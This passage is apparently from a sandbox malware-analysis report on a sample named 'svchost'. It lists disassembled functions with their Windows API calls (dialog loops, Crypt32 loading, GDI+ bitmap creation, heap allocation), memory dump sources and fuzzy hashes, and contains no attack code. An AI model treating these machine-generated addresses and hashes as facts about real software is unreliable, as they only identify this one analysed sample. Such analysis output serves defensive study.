                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0084DF03
                                                              • Part of subcall function 0084B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                              • Part of subcall function 0084B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                              • Part of subcall function 0084B568: IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                              • Part of subcall function 0084B568: TranslateMessage.USER32(?), ref: 0084B5AC
                                                              • Part of subcall function 0084B568: DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 1082566141f4a18e3b9869f95fa9f86fc99b08fb7b6353d1e00944fc4af038c1
                                                            • Instruction ID: 3380d560df9accad0fe71735754c87769cf9b418182ec847c1c69a11b1bef892
                                                            • Opcode Fuzzy Hash: 1082566141f4a18e3b9869f95fa9f86fc99b08fb7b6353d1e00944fc4af038c1
                                                            • Instruction Fuzzy Hash: A0E092B650024C66DF02AB68DC0EF9E3B6CBB15785F040851B204DB0B2EA78EA508766
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 83a80c43f5251918dcb72e901fe4f53e837dbe7edec5c9b17f5d9f12747c692b
                                                            • Instruction ID: 81e2a453693af965b8ba6b1633ae1fce04ca819c70830d22abbd29a79ebb2e35
                                                            • Opcode Fuzzy Hash: 83a80c43f5251918dcb72e901fe4f53e837dbe7edec5c9b17f5d9f12747c692b
                                                            • Instruction Fuzzy Hash: ECE01AB680016C6ADB11ABA49C49FDABBACFF09391F040065B649E2005DAB4DA848BA1
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0084A3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0084A3E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 7df966a5ecbce3721819c974f9456c06b30f3e4b0649573a314a560412d24214
                                                            • Instruction ID: 3ca87f8914ab6fc288c1121306069ccb93e8eb0f6470059d35b5456852074621
                                                            • Opcode Fuzzy Hash: 7df966a5ecbce3721819c974f9456c06b30f3e4b0649573a314a560412d24214
                                                            • Instruction Fuzzy Hash: 23E0ED7150121CEBCB14DF99C5456AEBBE8FB05364F10805AA886E7301E374AE04DB92
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00852BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00852BB5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 9355042e34944852ff9212e87fa7db3e842d82a34b20b2a516b283a9c4a288cc
                                                            • Instruction ID: 1224001d18d1efd6494b5b4d6d7a96d8f9eb95e83d6998d52532821bd1646ba9
                                                            • Opcode Fuzzy Hash: 9355042e34944852ff9212e87fa7db3e842d82a34b20b2a516b283a9c4a288cc
                                                            • Instruction Fuzzy Hash: 2AD02239154300AA4C147E7828034483355FE53BB77E013CAFC30C55C1FF14804CA013
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 4feb6b878dd4fd50c966a7c6799b33f9ea51ac800513f3e0f4ee84600279b4bb
                                                            • Instruction ID: 9ae70f7fb9eab8773597e49a05f3a0c673957adb4e97b2b05c9890226048fc17
                                                            • Opcode Fuzzy Hash: 4feb6b878dd4fd50c966a7c6799b33f9ea51ac800513f3e0f4ee84600279b4bb
                                                            • Instruction Fuzzy Hash: 41C0123605C200BECB022BB4DC09C2BBBA8BBA5316F08C90AB0A5C0070C239C210DB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: c17ec04132813debb14f2d4c9671c3d1bdefb2faff78daa5a6f4c77f46dc2420
                                                            • Instruction ID: 1612beb8e7e7d8ab4e24be1556463ba4cc97b927168e7dcac95d66f5a16999a5
                                                            • Opcode Fuzzy Hash: c17ec04132813debb14f2d4c9671c3d1bdefb2faff78daa5a6f4c77f46dc2420
                                                            • Instruction Fuzzy Hash: 58C1A230A002549FEF15DF68C4D8BA9BBA5FF96720F0805B9EC45DB396DB309944CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: d3844707e8029df880f57af8ea725121a4c4d9735b956079561ecf19be711972
                                                            • Instruction ID: f6410c46ac571b0ffd5fbd503dac24de667fba3e29b0eac14f232aacf12c8e9a
                                                            • Opcode Fuzzy Hash: d3844707e8029df880f57af8ea725121a4c4d9735b956079561ecf19be711972
                                                            • Instruction Fuzzy Hash: 9671D271100F449EDB25DB78C8559E7B7E9FF54301F40492EE2ABC7641DA326A88CF92
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00838289
                                                              • Part of subcall function 008313DC: __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 0083A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            • Opcode ID: a8be848f443d196cdfc8a624c64c168d48d2be2c165e85133625f3311fc2055c
                                                            • Instruction ID: 77793913f193ea14f00b161f7c48552555bdf29d2728ac2defc7a9ec56d9e98f
                                                            • Opcode Fuzzy Hash: a8be848f443d196cdfc8a624c64c168d48d2be2c165e85133625f3311fc2055c
                                                            • Instruction Fuzzy Hash: 5741C7719047589ADF20DBA4CC55AEAB378FF80704F0404EAF18AE7182EB755EC8CB91
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: eb44b11164a21ae76ca8bb738fb2d309d87f1cceb11c29eb1007ef4f9c493634
                                                            • Instruction ID: 4104b51cbc182c89f054b0da6ddf8635b0b669c843d33691b7d37ef2ffb477e2
                                                            • Opcode Fuzzy Hash: eb44b11164a21ae76ca8bb738fb2d309d87f1cceb11c29eb1007ef4f9c493634
                                                            • Instruction Fuzzy Hash: 424157B0905B409EE724DF398885AE6FBE5FB18300F50492ED6FEC3282CB326654CB51
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008313E1
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 0083B505: __EH_prolog.LIBCMT ref: 0083B50A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: c53f520769f32c29e1414d43ac9b58332e4583144aadca1eca089c9a1569b2b7
                                                            • Instruction ID: 5c28c995b5ea9b0c5f72d05b5ea1c0143030a74b66d122c9cdceeb26b190c9fe
                                                            • Opcode Fuzzy Hash: c53f520769f32c29e1414d43ac9b58332e4583144aadca1eca089c9a1569b2b7
                                                            • Instruction Fuzzy Hash: 034136B0905B409AE724DF798885AE6FBE5FF18310F50492ED6FEC3282CB326654CB51
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084B098
                                                              • Part of subcall function 008313DC: __EH_prolog.LIBCMT ref: 008313E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 70a35782c14d60c1164f8d309c694ef72b760e2043899b15223146921f345eba
                                                            • Instruction ID: 2467db78d9c675e51599b2cf125e1fc87ccbc32a81df2c60512cf93eb23746ac
                                                            • Opcode Fuzzy Hash: 70a35782c14d60c1164f8d309c694ef72b760e2043899b15223146921f345eba
                                                            • Instruction Fuzzy Hash: 78314A758042499ACF15DFA8C9519EEBBB4FF59304F10449AE809F7242DB75AE048BA2
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,00863A34), ref: 0085ACF8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 37d0cdf1af5cfda314ae06fd8f273e55efcb22307db25da3b0b3d7aadd36daa5
                                                            • Instruction ID: e42b1d75e35b9195604b3dea019a35ae68c72b50acae5ddcec154ff3e33d770d
                                                            • Opcode Fuzzy Hash: 37d0cdf1af5cfda314ae06fd8f273e55efcb22307db25da3b0b3d7aadd36daa5
                                                            • Instruction Fuzzy Hash: 0111A337A006256F9B2AAE2CEC9096A73A5FB843667164320ED15EB654D630DC0587D2
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 00835E37: __EH_prolog.LIBCMT ref: 00835E3C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 4b1c2960a01868a4ba0da6b13c695a980ffbeccf3cc78b61388b8b5fce19fb08
                                                            • Instruction ID: a4ff2571571f04fbe55cd429f0c7f987c74923060dc21114da77b1bea78ad2ad
                                                            • Opcode Fuzzy Hash: 4b1c2960a01868a4ba0da6b13c695a980ffbeccf3cc78b61388b8b5fce19fb08
                                                            • Instruction Fuzzy Hash: 7C115171A002449AEB14DB7DC545BAEBBE8FF84300F10446EE486E3282DA745A04CBA3
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: a42a5a457bd98e93b31bea5835a361ecd0fa1bd8fd1f7ff9d61a61fa9d31ac45
                                                            • Instruction ID: 31b63277495978e207685789fa0e5c313d5b437e36704a7b129e7d293912a5ed
                                                            • Opcode Fuzzy Hash: a42a5a457bd98e93b31bea5835a361ecd0fa1bd8fd1f7ff9d61a61fa9d31ac45
                                                            • Instruction Fuzzy Hash: 68015E73900928ABCF22ABACCC819DEB776FFC8750F014525E866F7252DA748D05C6E1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084DA57
                                                              • Part of subcall function 00840659: _wcslen.LIBCMT ref: 0084066F
                                                              • Part of subcall function 00837B0D: __EH_prolog.LIBCMT ref: 00837B12
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 9f73c9c828a578761c8216b42c398e92fd7408e064a45c91b1476ec125d6e83e
                                                            • Instruction ID: 3551871c9a3ed489ae02b07dc18aa9b38633f55ce626d607df462478b69d44d2
                                                            • Opcode Fuzzy Hash: 9f73c9c828a578761c8216b42c398e92fd7408e064a45c91b1476ec125d6e83e
                                                            • Instruction Fuzzy Hash: 5B11EB71508294EED711EB9CA8067DD7BA0FB25710F0140AEE245E3392DBB59A44CB62
                                                            APIs
                                                              • Part of subcall function 0085B136: RtlAllocateHeap.NTDLL(00000008,00863A34,00000000,?,0085989A,00000001,00000364,?,?,?,0083D984,?,?,?,00000004,0083D710), ref: 0085B177
                                                            • _free.LIBCMT ref: 0085C4E5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 68d39c4cff342ce39e597a1a715b80465afe24566a29d6cd36b19b786e58697b
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 7D01D6722003056FE3318E699885D6AFBE9FB85371F25061DE994D3281EA30A949CB79
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00837B12
                                                              • Part of subcall function 0083CE40: __EH_prolog.LIBCMT ref: 0083CE45
                                                              • Part of subcall function 00842089: __EH_prolog.LIBCMT ref: 0084208E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b0d278f54ecd122cdcfdb4e0479838569978540f4c0b31535e0e1dc9165c4347
                                                            • Instruction ID: 9d4a7c2519f0b176cdfb32cdc01202c4a16e1c745fd89c80c8062131ce0c5151
                                                            • Opcode Fuzzy Hash: b0d278f54ecd122cdcfdb4e0479838569978540f4c0b31535e0e1dc9165c4347
                                                            • Instruction Fuzzy Hash: 3C0180716107499BDB24DFB8C4417AEF6F4FF48366F10892EE05AE3280D7B49904C7A1
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00863A34,00000000,?,0085989A,00000001,00000364,?,?,?,0083D984,?,?,?,00000004,0083D710), ref: 0085B177
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: e8aadc3c8c83e940c738cc529458cc8926bc1e15d33530c0e8e84ee7bc9425a6
                                                            • Instruction ID: ec0db840ebae35b6e695a4f68f34a635a69dbee267be3fec7e78b6d35dcd8cbd
